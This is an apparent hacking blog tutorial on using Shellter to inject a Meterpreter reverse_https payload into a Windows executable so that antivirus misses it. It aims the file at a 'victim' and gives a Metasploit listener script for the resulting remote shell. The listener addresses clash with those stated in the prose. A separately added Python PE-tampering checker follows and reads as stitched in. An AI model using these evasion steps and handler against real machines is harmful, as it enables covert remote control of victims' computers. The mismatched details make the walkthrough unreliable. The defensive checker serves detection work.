Bypassing antivirus programs using SHELLTER

Shellter is another antivirus evasion tool, like the Veil-Evasion framework, which infects a PE dynamically and can be used to inject shellcode into any 32-bit native Windows application. The tool lets us either supply a custom payload or use Metasploit payloads directly. Most antivirus programs will not identify the resulting executable, because its signature changes every time the attacker re-encodes it, so there is no fixed signature to match.



Shellter can be installed by running apt-get install shellter in a Kali Linux terminal (use sudo apt-get install shellter if you are not logged in as root). Once the application is installed, open Shellter by issuing the shellter command in the terminal.
Our objective now is to create a malicious executable file, as explained below in 7 steps:

  • Shellter first asks you to choose between Auto (A), Manual (M) and Help (H). I am going to use Auto mode.

  • The 2nd step is to provide the PE target file; you can choose any .exe file or use the executables in /usr/share/windows-binaries/.

  • After the PE target file location is provided, Shellter disassembles the PE file.

  • Shellter then asks whether or not to enable stealth mode.

  • After the stealth mode selection, you can inject one of the listed payloads into the same PE file.

  • I prefer meterpreter_reverse_HTTPS; then provide the LHOST and LPORT.

  • Once all the info is fed to Shellter, the PE file provided as input is injected with the payload and the injection is complete.


After the file is created you can scan it with any antivirus program to verify. Once this executable is delivered to the victim, the sender needs to start a listener matching the payload; in my example, LHOST is 192.168.1.242 and LPORT is 5244:

# listener.rc: Metasploit handler for the payload injected by Shellter
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.102
set lport 5544
# keep the handler running after the first session connects
set exitonsession false
exploit -j -z


To invoke the above commands easily, save the preceding list of commands to a file named listener.rc and run it with Metasploit using msfconsole -r listener.rc. Once the victim opens the executable without being blocked by the antivirus or any other security controls, it should open the tunnel back to the attacker's IP without any trouble. :)
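The post leaves verification to whatever antivirus is installed on the receiving side. Two checks that do not depend on signatures are worth having there: comparing a received executable against a trusted copy of the same program (the post injects into an existing PE, so a trusted copy differs in measurable ways), and flagging header properties that a normally compiled binary rarely shows, such as a section that is both writable and executable or an entry point that lands outside the code section. The following Python script is an added example and is not code from the post or from the Shellter project; the PE header parser, the check functions and the header-only sample images are constructed for this example, and the heuristics are generic indicators of tampering rather than a description of what Shellter specifically changes.

```python
import hashlib
import struct

# Section characteristics flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

SECTION_FMT = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER


def parse_pe(data):
    """Return (entry_rva, sections) for a PE32/PE32+ image, where sections is a
    list of (name, virtual_address, virtual_size, characteristics) tuples."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    _, num_sections, _, _, _, size_of_opt, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic %#x" % magic)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    off = opt + size_of_opt
    for _ in range(num_sections):
        f = struct.unpack_from(SECTION_FMT, data, off)
        name = f[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, f[2], f[1], f[9]))  # VirtualAddress, VirtualSize, Characteristics
        off += struct.calcsize(SECTION_FMT)
    return entry_rva, sections


def check_pe(data):
    """Signature-independent heuristics: W+X sections and a misplaced entry point."""
    entry_rva, sections = parse_pe(data)
    findings = []
    entry_section = None
    for name, va, vsize, chars in sections:
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append("section %s is both writable and executable" % name)
        if va <= entry_rva < va + vsize:
            entry_section = (name, chars)
    if entry_section is None:
        findings.append("entry point %#x lies outside every section" % entry_rva)
    elif not entry_section[1] & IMAGE_SCN_CNT_CODE:
        findings.append("entry point %#x is in non-code section %s" % (entry_rva, entry_section[0]))
    return findings


def diff_pe(trusted, received):
    """Compare a received executable against a trusted copy of the same program."""
    if hashlib.sha256(trusted).digest() == hashlib.sha256(received).digest():
        return []  # byte-identical: nothing to report
    t_entry, t_secs = parse_pe(trusted)
    r_entry, r_secs = parse_pe(received)
    changes = ["file contents differ (sha256 mismatch)"]
    if t_entry != r_entry:
        changes.append("entry point moved from %#x to %#x" % (t_entry, r_entry))
    if len(t_secs) != len(r_secs):
        changes.append("section count changed from %d to %d" % (len(t_secs), len(r_secs)))
    for t, r in zip(t_secs, r_secs):
        if t[3] != r[3]:
            changes.append("section %s characteristics changed %#x -> %#x" % (t[0], t[3], r[3]))
        if t[2] != r[2]:
            changes.append("section %s virtual size changed %#x -> %#x" % (t[0], t[2], r[2]))
    return changes


def build_pe(entry_rva, sections):
    """Construct a minimal header-only PE32 image (constructed test data, not a runnable program)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)         # e_lfanew: PE header right after the DOS header
    opt = bytearray(224)                           # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)         # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)    # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"), vsize, va, vsize, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


TEXT = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Constructed samples: a clean layout, and a copy whose entry point now lands in a
# data section that has additionally been marked executable.
TRUSTED = build_pe(0x1010, [(".text", 0x1000, 0x2000, TEXT), (".data", 0x3000, 0x1000, DATA)])
RECEIVED = build_pe(0x3200, [(".text", 0x1000, 0x2000, TEXT),
                             (".data", 0x3000, 0x1000, DATA | IMAGE_SCN_MEM_EXECUTE)])

if __name__ == "__main__":
    for line in check_pe(RECEIVED) + diff_pe(TRUSTED, RECEIVED):
        print(line)
```

On real files, read both copies with open(path, "rb").read() and pass the bytes to diff_pe and check_pe; the parser only touches headers, so it runs in constant time regardless of file size. The heuristics produce false positives on packers and some unusual linkers, so treat a finding as a reason to look closer, not as a verdict.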



Thanks for reading. Now let me recommend some other practical guides about penetration testing of Remote Access Protocols, Remote Desktop Protocol, SSH Network Protocol, Network Routers, Wordpress websites using WPSeku,

My Hack Stuff: Bypassing antivirus programs using SHELLTER
https://www.myhackstuff.com/2018/01/bypassing-antivirus-programs-using.html